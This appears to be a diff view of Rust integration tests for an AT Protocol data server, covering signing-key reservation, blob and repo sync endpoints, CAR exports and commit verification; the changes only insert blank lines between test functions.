#[tokio::test]
372
async fn test_deactivate_account_success() {
373
let client = client();
+10
tests/signing_key.rs
+10
tests/signing_key.rs
···
4
use serde_json::{json, Value};
5
use sqlx::PgPool;
6
use helpers::verify_new_account;
7
async fn get_pool() -> PgPool {
8
let conn_str = common::get_db_connection_string().await;
9
sqlx::postgres::PgPoolOptions::new()
···
12
.await
13
.expect("Failed to connect to test database")
14
}
15
#[tokio::test]
16
async fn test_reserve_signing_key_without_did() {
17
let client = common::client();
···
34
"Signing key should be in did:key format with multibase prefix"
35
);
36
}
37
#[tokio::test]
38
async fn test_reserve_signing_key_with_did() {
39
let client = common::client();
···
63
assert_eq!(row.did.as_deref(), Some(target_did));
64
assert_eq!(row.public_key_did_key, signing_key);
65
}
66
#[tokio::test]
67
async fn test_reserve_signing_key_stores_private_key() {
68
let client = common::client();
···
91
assert!(row.used_at.is_none(), "Reserved key should not be marked as used yet");
92
assert!(row.expires_at > chrono::Utc::now(), "Key should expire in the future");
93
}
94
#[tokio::test]
95
async fn test_reserve_signing_key_unique_keys() {
96
let client = common::client();
···
121
let key2 = body2["signingKey"].as_str().unwrap();
122
assert_ne!(key1, key2, "Each call should generate a unique signing key");
123
}
124
#[tokio::test]
125
async fn test_reserve_signing_key_is_public() {
126
let client = common::client();
···
140
"reserveSigningKey should work without authentication"
141
);
142
}
143
#[tokio::test]
144
async fn test_create_account_with_reserved_signing_key() {
145
let client = common::client();
···
190
"Reserved key should be marked as used"
191
);
192
}
193
#[tokio::test]
194
async fn test_create_account_with_invalid_signing_key() {
195
let client = common::client();
···
213
let body: Value = res.json().await.unwrap();
214
assert_eq!(body["error"], "InvalidSigningKey");
215
}
216
#[tokio::test]
217
async fn test_create_account_cannot_reuse_signing_key() {
218
let client = common::client();
···
268
.unwrap()
269
.contains("already used"));
270
}
271
#[tokio::test]
272
async fn test_reserved_key_tokens_work() {
273
let client = common::client();
···
4
use serde_json::{json, Value};
5
use sqlx::PgPool;
6
use helpers::verify_new_account;
7
+
8
async fn get_pool() -> PgPool {
9
let conn_str = common::get_db_connection_string().await;
10
sqlx::postgres::PgPoolOptions::new()
···
13
.await
14
.expect("Failed to connect to test database")
15
}
16
+
17
#[tokio::test]
18
async fn test_reserve_signing_key_without_did() {
19
let client = common::client();
···
36
"Signing key should be in did:key format with multibase prefix"
37
);
38
}
39
+
40
#[tokio::test]
41
async fn test_reserve_signing_key_with_did() {
42
let client = common::client();
···
66
assert_eq!(row.did.as_deref(), Some(target_did));
67
assert_eq!(row.public_key_did_key, signing_key);
68
}
69
+
70
#[tokio::test]
71
async fn test_reserve_signing_key_stores_private_key() {
72
let client = common::client();
···
95
assert!(row.used_at.is_none(), "Reserved key should not be marked as used yet");
96
assert!(row.expires_at > chrono::Utc::now(), "Key should expire in the future");
97
}
98
+
99
#[tokio::test]
100
async fn test_reserve_signing_key_unique_keys() {
101
let client = common::client();
···
126
let key2 = body2["signingKey"].as_str().unwrap();
127
assert_ne!(key1, key2, "Each call should generate a unique signing key");
128
}
129
+
130
#[tokio::test]
131
async fn test_reserve_signing_key_is_public() {
132
let client = common::client();
···
146
"reserveSigningKey should work without authentication"
147
);
148
}
149
+
150
#[tokio::test]
151
async fn test_create_account_with_reserved_signing_key() {
152
let client = common::client();
···
197
"Reserved key should be marked as used"
198
);
199
}
200
+
201
#[tokio::test]
202
async fn test_create_account_with_invalid_signing_key() {
203
let client = common::client();
···
221
let body: Value = res.json().await.unwrap();
222
assert_eq!(body["error"], "InvalidSigningKey");
223
}
224
+
225
#[tokio::test]
226
async fn test_create_account_cannot_reuse_signing_key() {
227
let client = common::client();
···
277
.unwrap()
278
.contains("already used"));
279
}
280
+
281
#[tokio::test]
282
async fn test_reserved_key_tokens_work() {
283
let client = common::client();
+4
tests/sync_blob.rs
+4
tests/sync_blob.rs
···
3
use reqwest::StatusCode;
4
use reqwest::header;
5
use serde_json::Value;
6
#[tokio::test]
7
async fn test_list_blobs_success() {
8
let client = client();
···
35
let cids = body["cids"].as_array().unwrap();
36
assert!(!cids.is_empty());
37
}
38
#[tokio::test]
39
async fn test_list_blobs_not_found() {
40
let client = client();
···
52
let body: Value = res.json().await.expect("Response was not valid JSON");
53
assert_eq!(body["error"], "RepoNotFound");
54
}
55
#[tokio::test]
56
async fn test_get_blob_success() {
57
let client = client();
···
91
let body = res.text().await.expect("Failed to get body");
92
assert_eq!(body, blob_content);
93
}
94
#[tokio::test]
95
async fn test_get_blob_not_found() {
96
let client = client();
···
3
use reqwest::StatusCode;
4
use reqwest::header;
5
use serde_json::Value;
6
+
7
#[tokio::test]
8
async fn test_list_blobs_success() {
9
let client = client();
···
36
let cids = body["cids"].as_array().unwrap();
37
assert!(!cids.is_empty());
38
}
39
+
40
#[tokio::test]
41
async fn test_list_blobs_not_found() {
42
let client = client();
···
54
let body: Value = res.json().await.expect("Response was not valid JSON");
55
assert_eq!(body["error"], "RepoNotFound");
56
}
57
+
58
#[tokio::test]
59
async fn test_get_blob_success() {
60
let client = client();
···
94
let body = res.text().await.expect("Failed to get body");
95
assert_eq!(body, blob_content);
96
}
97
+
98
#[tokio::test]
99
async fn test_get_blob_not_found() {
100
let client = client();
+14
tests/sync_deprecated.rs
+14
tests/sync_deprecated.rs
···
4
use helpers::*;
5
use reqwest::StatusCode;
6
use serde_json::Value;
7
#[tokio::test]
8
async fn test_get_head_success() {
9
let client = client();
···
23
let root = body["root"].as_str().unwrap();
24
assert!(root.starts_with("bafy"), "Root CID should be a CID");
25
}
26
#[tokio::test]
27
async fn test_get_head_not_found() {
28
let client = client();
···
40
assert_eq!(body["error"], "HeadNotFound");
41
assert!(body["message"].as_str().unwrap().contains("Could not find root"));
42
}
43
#[tokio::test]
44
async fn test_get_head_missing_param() {
45
let client = client();
···
53
.expect("Failed to send request");
54
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
55
}
56
#[tokio::test]
57
async fn test_get_head_empty_did() {
58
let client = client();
···
69
let body: Value = res.json().await.expect("Response was not valid JSON");
70
assert_eq!(body["error"], "InvalidRequest");
71
}
72
#[tokio::test]
73
async fn test_get_head_whitespace_did() {
74
let client = client();
···
83
.expect("Failed to send request");
84
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
85
}
86
#[tokio::test]
87
async fn test_get_head_changes_after_record_create() {
88
let client = client();
···
112
let head2 = body2["root"].as_str().unwrap().to_string();
113
assert_ne!(head1, head2, "Head CID should change after record creation");
114
}
115
#[tokio::test]
116
async fn test_get_checkout_success() {
117
let client = client();
···
137
assert!(!body.is_empty(), "CAR file should not be empty");
138
assert!(body.len() > 50, "CAR file should contain actual data");
139
}
140
#[tokio::test]
141
async fn test_get_checkout_not_found() {
142
let client = client();
···
153
let body: Value = res.json().await.expect("Response was not valid JSON");
154
assert_eq!(body["error"], "RepoNotFound");
155
}
156
#[tokio::test]
157
async fn test_get_checkout_missing_param() {
158
let client = client();
···
166
.expect("Failed to send request");
167
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
168
}
169
#[tokio::test]
170
async fn test_get_checkout_empty_did() {
171
let client = client();
···
180
.expect("Failed to send request");
181
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
182
}
183
#[tokio::test]
184
async fn test_get_checkout_empty_repo() {
185
let client = client();
···
197
let body = res.bytes().await.expect("Failed to get body");
198
assert!(!body.is_empty(), "Even empty repo should return CAR header");
199
}
200
#[tokio::test]
201
async fn test_get_checkout_includes_multiple_records() {
202
let client = client();
···
218
let body = res.bytes().await.expect("Failed to get body");
219
assert!(body.len() > 500, "CAR file with 5 records should be larger");
220
}
221
#[tokio::test]
222
async fn test_get_head_matches_latest_commit() {
223
let client = client();
···
246
let latest_cid = latest_body["cid"].as_str().unwrap();
247
assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid");
248
}
249
#[tokio::test]
250
async fn test_get_checkout_car_header_valid() {
251
let client = client();
···
4
use helpers::*;
5
use reqwest::StatusCode;
6
use serde_json::Value;
7
+
8
#[tokio::test]
9
async fn test_get_head_success() {
10
let client = client();
···
24
let root = body["root"].as_str().unwrap();
25
assert!(root.starts_with("bafy"), "Root CID should be a CID");
26
}
27
+
28
#[tokio::test]
29
async fn test_get_head_not_found() {
30
let client = client();
···
42
assert_eq!(body["error"], "HeadNotFound");
43
assert!(body["message"].as_str().unwrap().contains("Could not find root"));
44
}
45
+
46
#[tokio::test]
47
async fn test_get_head_missing_param() {
48
let client = client();
···
56
.expect("Failed to send request");
57
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
58
}
59
+
60
#[tokio::test]
61
async fn test_get_head_empty_did() {
62
let client = client();
···
73
let body: Value = res.json().await.expect("Response was not valid JSON");
74
assert_eq!(body["error"], "InvalidRequest");
75
}
76
+
77
#[tokio::test]
78
async fn test_get_head_whitespace_did() {
79
let client = client();
···
88
.expect("Failed to send request");
89
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
90
}
91
+
92
#[tokio::test]
93
async fn test_get_head_changes_after_record_create() {
94
let client = client();
···
118
let head2 = body2["root"].as_str().unwrap().to_string();
119
assert_ne!(head1, head2, "Head CID should change after record creation");
120
}
121
+
122
#[tokio::test]
123
async fn test_get_checkout_success() {
124
let client = client();
···
144
assert!(!body.is_empty(), "CAR file should not be empty");
145
assert!(body.len() > 50, "CAR file should contain actual data");
146
}
147
+
148
#[tokio::test]
149
async fn test_get_checkout_not_found() {
150
let client = client();
···
161
let body: Value = res.json().await.expect("Response was not valid JSON");
162
assert_eq!(body["error"], "RepoNotFound");
163
}
164
+
165
#[tokio::test]
166
async fn test_get_checkout_missing_param() {
167
let client = client();
···
175
.expect("Failed to send request");
176
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
177
}
178
+
179
#[tokio::test]
180
async fn test_get_checkout_empty_did() {
181
let client = client();
···
190
.expect("Failed to send request");
191
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
192
}
193
+
194
#[tokio::test]
195
async fn test_get_checkout_empty_repo() {
196
let client = client();
···
208
let body = res.bytes().await.expect("Failed to get body");
209
assert!(!body.is_empty(), "Even empty repo should return CAR header");
210
}
211
+
212
#[tokio::test]
213
async fn test_get_checkout_includes_multiple_records() {
214
let client = client();
···
230
let body = res.bytes().await.expect("Failed to get body");
231
assert!(body.len() > 500, "CAR file with 5 records should be larger");
232
}
233
+
234
#[tokio::test]
235
async fn test_get_head_matches_latest_commit() {
236
let client = client();
···
259
let latest_cid = latest_body["cid"].as_str().unwrap();
260
assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid");
261
}
262
+
263
#[tokio::test]
264
async fn test_get_checkout_car_header_valid() {
265
let client = client();
+18
tests/sync_repo.rs
+18
tests/sync_repo.rs
···
5
use reqwest::StatusCode;
6
use reqwest::header;
7
use serde_json::{Value, json};
8
#[tokio::test]
9
async fn test_get_latest_commit_success() {
10
let client = client();
···
24
assert!(body["cid"].is_string());
25
assert!(body["rev"].is_string());
26
}
27
#[tokio::test]
28
async fn test_get_latest_commit_not_found() {
29
let client = client();
···
41
let body: Value = res.json().await.expect("Response was not valid JSON");
42
assert_eq!(body["error"], "RepoNotFound");
43
}
44
#[tokio::test]
45
async fn test_get_latest_commit_missing_param() {
46
let client = client();
···
54
.expect("Failed to send request");
55
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
56
}
57
#[tokio::test]
58
async fn test_list_repos() {
59
let client = client();
···
76
assert!(repo["head"].is_string());
77
assert!(repo["active"].is_boolean());
78
}
79
#[tokio::test]
80
async fn test_list_repos_with_limit() {
81
let client = client();
···
97
let repos = body["repos"].as_array().unwrap();
98
assert!(repos.len() <= 2);
99
}
100
#[tokio::test]
101
async fn test_list_repos_pagination() {
102
let client = client();
···
135
assert_ne!(repos[0]["did"], repos2[0]["did"]);
136
}
137
}
138
#[tokio::test]
139
async fn test_get_repo_status_success() {
140
let client = client();
···
155
assert_eq!(body["active"], true);
156
assert!(body["rev"].is_string());
157
}
158
#[tokio::test]
159
async fn test_get_repo_status_not_found() {
160
let client = client();
···
172
let body: Value = res.json().await.expect("Response was not valid JSON");
173
assert_eq!(body["error"], "RepoNotFound");
174
}
175
#[tokio::test]
176
async fn test_notify_of_update() {
177
let client = client();
···
187
.expect("Failed to send request");
188
assert_eq!(res.status(), StatusCode::OK);
189
}
190
#[tokio::test]
191
async fn test_request_crawl() {
192
let client = client();
···
202
.expect("Failed to send request");
203
assert_eq!(res.status(), StatusCode::OK);
204
}
205
#[tokio::test]
206
async fn test_get_repo_success() {
207
let client = client();
···
245
let body = res.bytes().await.expect("Failed to get body");
246
assert!(!body.is_empty());
247
}
248
#[tokio::test]
249
async fn test_get_repo_not_found() {
250
let client = client();
···
262
let body: Value = res.json().await.expect("Response was not valid JSON");
263
assert_eq!(body["error"], "RepoNotFound");
264
}
265
#[tokio::test]
266
async fn test_get_record_sync_success() {
267
let client = client();
···
312
let body = res.bytes().await.expect("Failed to get body");
313
assert!(!body.is_empty());
314
}
315
#[tokio::test]
316
async fn test_get_record_sync_not_found() {
317
let client = client();
···
334
let body: Value = res.json().await.expect("Response was not valid JSON");
335
assert_eq!(body["error"], "RecordNotFound");
336
}
337
#[tokio::test]
338
async fn test_get_blocks_success() {
339
let client = client();
···
369
Some("application/vnd.ipld.car")
370
);
371
}
372
#[tokio::test]
373
async fn test_get_blocks_not_found() {
374
let client = client();
···
383
.expect("Failed to send request");
384
assert_eq!(res.status(), StatusCode::NOT_FOUND);
385
}
386
#[tokio::test]
387
async fn test_sync_record_lifecycle() {
388
let client = client();
···
491
"Second post should still be accessible"
492
);
493
}
494
#[tokio::test]
495
async fn test_sync_repo_export_lifecycle() {
496
let client = client();
···
5
use reqwest::StatusCode;
6
use reqwest::header;
7
use serde_json::{Value, json};
8
+
9
#[tokio::test]
10
async fn test_get_latest_commit_success() {
11
let client = client();
···
25
assert!(body["cid"].is_string());
26
assert!(body["rev"].is_string());
27
}
28
+
29
#[tokio::test]
30
async fn test_get_latest_commit_not_found() {
31
let client = client();
···
43
let body: Value = res.json().await.expect("Response was not valid JSON");
44
assert_eq!(body["error"], "RepoNotFound");
45
}
46
+
47
#[tokio::test]
48
async fn test_get_latest_commit_missing_param() {
49
let client = client();
···
57
.expect("Failed to send request");
58
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
59
}
60
+
61
#[tokio::test]
62
async fn test_list_repos() {
63
let client = client();
···
80
assert!(repo["head"].is_string());
81
assert!(repo["active"].is_boolean());
82
}
83
+
84
#[tokio::test]
85
async fn test_list_repos_with_limit() {
86
let client = client();
···
102
let repos = body["repos"].as_array().unwrap();
103
assert!(repos.len() <= 2);
104
}
105
+
106
#[tokio::test]
107
async fn test_list_repos_pagination() {
108
let client = client();
···
141
assert_ne!(repos[0]["did"], repos2[0]["did"]);
142
}
143
}
144
+
145
#[tokio::test]
146
async fn test_get_repo_status_success() {
147
let client = client();
···
162
assert_eq!(body["active"], true);
163
assert!(body["rev"].is_string());
164
}
165
+
166
#[tokio::test]
167
async fn test_get_repo_status_not_found() {
168
let client = client();
···
180
let body: Value = res.json().await.expect("Response was not valid JSON");
181
assert_eq!(body["error"], "RepoNotFound");
182
}
183
+
184
#[tokio::test]
185
async fn test_notify_of_update() {
186
let client = client();
···
196
.expect("Failed to send request");
197
assert_eq!(res.status(), StatusCode::OK);
198
}
199
+
200
#[tokio::test]
201
async fn test_request_crawl() {
202
let client = client();
···
212
.expect("Failed to send request");
213
assert_eq!(res.status(), StatusCode::OK);
214
}
215
+
216
#[tokio::test]
217
async fn test_get_repo_success() {
218
let client = client();
···
256
let body = res.bytes().await.expect("Failed to get body");
257
assert!(!body.is_empty());
258
}
259
+
260
#[tokio::test]
261
async fn test_get_repo_not_found() {
262
let client = client();
···
274
let body: Value = res.json().await.expect("Response was not valid JSON");
275
assert_eq!(body["error"], "RepoNotFound");
276
}
277
+
278
#[tokio::test]
279
async fn test_get_record_sync_success() {
280
let client = client();
···
325
let body = res.bytes().await.expect("Failed to get body");
326
assert!(!body.is_empty());
327
}
328
+
329
#[tokio::test]
330
async fn test_get_record_sync_not_found() {
331
let client = client();
···
348
let body: Value = res.json().await.expect("Response was not valid JSON");
349
assert_eq!(body["error"], "RecordNotFound");
350
}
351
+
352
#[tokio::test]
353
async fn test_get_blocks_success() {
354
let client = client();
···
384
Some("application/vnd.ipld.car")
385
);
386
}
387
+
388
#[tokio::test]
389
async fn test_get_blocks_not_found() {
390
let client = client();
···
399
.expect("Failed to send request");
400
assert_eq!(res.status(), StatusCode::NOT_FOUND);
401
}
402
+
403
#[tokio::test]
404
async fn test_sync_record_lifecycle() {
405
let client = client();
···
508
"Second post should still be accessible"
509
);
510
}
511
+
512
#[tokio::test]
513
async fn test_sync_repo_export_lifecycle() {
514
let client = client();
+3
tests/verify_live_commit.rs
+3
tests/verify_live_commit.rs
···
3
use std::collections::HashMap;
4
use std::str::FromStr;
5
mod common;
6
#[tokio::test]
7
async fn test_verify_live_commit() {
8
let client = reqwest::Client::new();
···
51
}
52
}
53
}
54
fn commit_unsigned_bytes(commit: &jacquard_repo::commit::Commit<'_>) -> Vec<u8> {
55
#[derive(serde::Serialize)]
56
struct UnsignedCommit<'a> {
···
72
};
73
serde_ipld_dagcbor::to_vec(&unsigned).unwrap()
74
}
75
fn parse_car(cursor: &mut std::io::Cursor<&[u8]>) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> {
76
use std::io::Read;
77
fn read_varint<R: Read>(r: &mut R) -> std::io::Result<u64> {
···
3
use std::collections::HashMap;
4
use std::str::FromStr;
5
mod common;
6
+
7
#[tokio::test]
8
async fn test_verify_live_commit() {
9
let client = reqwest::Client::new();
···
52
}
53
}
54
}
55
+
56
fn commit_unsigned_bytes(commit: &jacquard_repo::commit::Commit<'_>) -> Vec<u8> {
57
#[derive(serde::Serialize)]
58
struct UnsignedCommit<'a> {
···
74
};
75
serde_ipld_dagcbor::to_vec(&unsigned).unwrap()
76
}
77
+
78
fn parse_car(cursor: &mut std::io::Cursor<&[u8]>) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> {
79
use std::io::Read;
80
fn read_varint<R: Read>(r: &mut R) -> std::io::Result<u64> {